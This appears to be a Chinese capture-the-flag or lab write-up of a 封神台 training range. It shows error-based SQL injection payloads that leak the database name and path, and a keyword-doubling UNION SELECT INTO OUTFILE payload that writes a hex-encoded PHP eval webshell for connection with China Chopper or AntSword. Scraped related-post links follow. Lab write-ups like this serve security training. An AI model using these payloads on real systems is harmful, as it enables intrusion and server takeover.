http://cntj8003.ia.aqlab.cn/bees/admin/login.phpz

直接在给出的靶场链接后面加上admin回车,跳转到后台登录页面,没有做目录扫描

1、在用户名处加上'测试,发现报错,存在注入漏洞

2、尝试报错注入

将用户名改为:admin' or extractvalue(1,concat(0x7e,database())) #

爆数据库安装路径admin' or extractvalue(1,concat(0x7e,@@basedir)) #

phpstudy,哈哈,盲猜网站的web路径为D:/phpStudy/ WWW

找个写入SQL写入一句话木马的payload

admin'+un+union+ion+seselectlect+1,2,3,4,0x3C3F70687020406576616C28245F504F53545B27313233275D293B3F3E++in+into+ououtfiletfile+'D:/phpStudy/www/ttt1.php'--+

其中0x为16进制编码的开头,3C3F70687020406576616C28245F504F53545B27313233275D293B3F3E为<?php @eval($_POST['123']);?>的16进制编码,其他内容请参考其他博主的博客~~

访问http://cntj8003.ia.aqlab.cn/ttt1.php

上菜刀蚁剑进行连接

end。

其实后台密码,我上来就admin+admin登录了,靶场的弱口令习惯了哈哈,但是没有进后台去上传的方式来getshell,哈哈。

封神台-尤里的复仇II 回归sql-注入绕过防护getshell相关推荐

  1. 尤里的复仇II 回归【7题】

    尤里的复仇II 回归[7题] 渗透第一步-信息收集 1 渗透第一步-信息收集 2 基础环境搭建 sqlmap尝鲜题 sql-注入绕过防护getshell awd攻防靶场-fuzz乱拳打死老师傅 归来- ...

  2. 尤里的复仇II 回归

    尤里的复仇II 归来 sqlmap尝鲜题 sql-注入绕过防护getshell sqlmap尝鲜题 Tips: 在修练的过程中,尤里发现在这个领域有很多的神器,只要获得这些神器,就可以让测试更加轻松- ...

  3. 封神台-尤里的复仇Ⅰ

    靶场链接:https://hack.zkaq.cn/ 文章目录 前言 四.为了更多的权限!留言板! 五.进击!拿到Web最高权限! 总结 前言 本来打算把尤里的复仇都做了,做到六就卡住了,不想做了,以 ...

  4. 掌控靶场 尤里复仇回归sql-注入绕过防护getshell

    作为小白做这个靶场时候,按照靶场的要求是要对waf进行绕过的,这次提供的不是绕过的思路,而是另外一个通过弱口令进入到后台之后,找到靶场存在的文件包含漏洞/文件越权访问(也不知道是不是这个漏洞有知道的大 ...

  5. 封神台----尤里的复仇I-第一章:为了女神小芳

    1.找注入点 ?id=1 and 1=1 ------ 显示正常 ?id=1 and 1=2 ------ 不显示 2.猜列数.报显示位 ?id=1 order by 2 ------查询了两列 ?i ...

  6. 封神台----尤里的复仇I-第四章:为了更多的权限!留言板!!

    本章主要是xss平台使用,很简单. 自己搭建xss平台或者网上随便找个平台注册使用. 新建个项目,建好后,将下面代码复制到留言板里. 提交,即可.去XSS平台接收消息. 提交,完成.

  7. 封神台 -尤里的复仇Ⅰ write up 夜车星繁的博客

    无意间知道了这个靶场,可作为复习用,就将它安排进了复习计划里,在此篇博客写下记录留作未来回顾用.因为有了点基础在此写下payload只保证自己可以看得懂. 第一章:为了女神小芳! ?id=1 and ...

  8. 黑客常用SQL注入绕过技术总结!

    今天给大家再次分享一篇硬核内容,那就是黑客常用的SQL注入绕过技术,还是那句话:我们学渗透技术不是为了攻击别人的系统,而是了解黑客常用的渗透技能,以此来修复我们自己系统中的漏洞,使我们的系统更加健壮, ...

  9. SQL注入绕过(passby)策略

    SQL注入绕过技巧 空格绕过 注释符/* */,%a0,%0a 括号绕过空格 select(user())from dual where(1=1)and(2=2) 引号绕过 采用16进制编码绕过,例如 ...

最新文章

  1. cart2pol函数
  2. 由浅到浅入门批量渲染(一)
  3. [转]用Whois获得电信运营商的IP地址是如何分配的?
  4. BugkuCTF-WEB题秋名山车
  5. jps命令 Java Virtual Machine Process Status Tool
  6. cpu占用高 mongo_排查MongoDB CPU使用率高的问题
  7. Layui 数据表格开启合计行
  8. 《编码的奥秘》读书笔记
  9. 下载和安装R、RStudio !~~~
  10. 电子购物网站导航制作
  11. Dfinity(ICP)介绍-1
  12. 智能数据中心和智慧园区:华为的单点突破与全局效应
  13. 使用python、java语言批量下载抖音中我的视频、我喜欢的视频,解析抖音视频,批量下载抖音...
  14. ASUS 論壇,有官方槍手,想要刪除抗議 Windows 7 的帖子,並合理化,並罵消費者白目
  15. 1156 Sexy Primes (20 point(s)) PAT 素数
  16. Notepad++实用插件整理(Json Viewer、Compare、Explorer、AnalysePlugin)
  17. c语言 结构体 ppt,第8章C语言的结构体和共同体.ppt
  18. Pinterest先辈Wists的创业故事
  19. 一条语句完成微信、支付宝支付,生成支付二维码
  20. 港科报道 | 香港科技大学(广州)人工智能产学研合作交流会成功举办

热门文章

  1. 西安拟制定羊肉泡馍肉夹馍制作标准
  2. 世上万事,不过是一懒二拖三不读书
  3. 使用安卓(华为)手机通过USB共享网络至Mac (M1pro)
  4. 计算机显卡性价比推荐,哪个型号显卡性价比最高?显卡性价比天梯图告诉你答案...
  5. 100个高频Spring面试题,助你一臂之力
  6. SH7218T拆解手记(12)IWNN(日文输入)的移植
  7. 硬汉内贾德:让美国人战栗(推荐)
  8. 收好了,这些max工作效率的学习资源,赶紧用起来
  9. pathlib.Path模块下的glob、rglob,glob模块下的glob、iglob
  10. springboot入门到入坟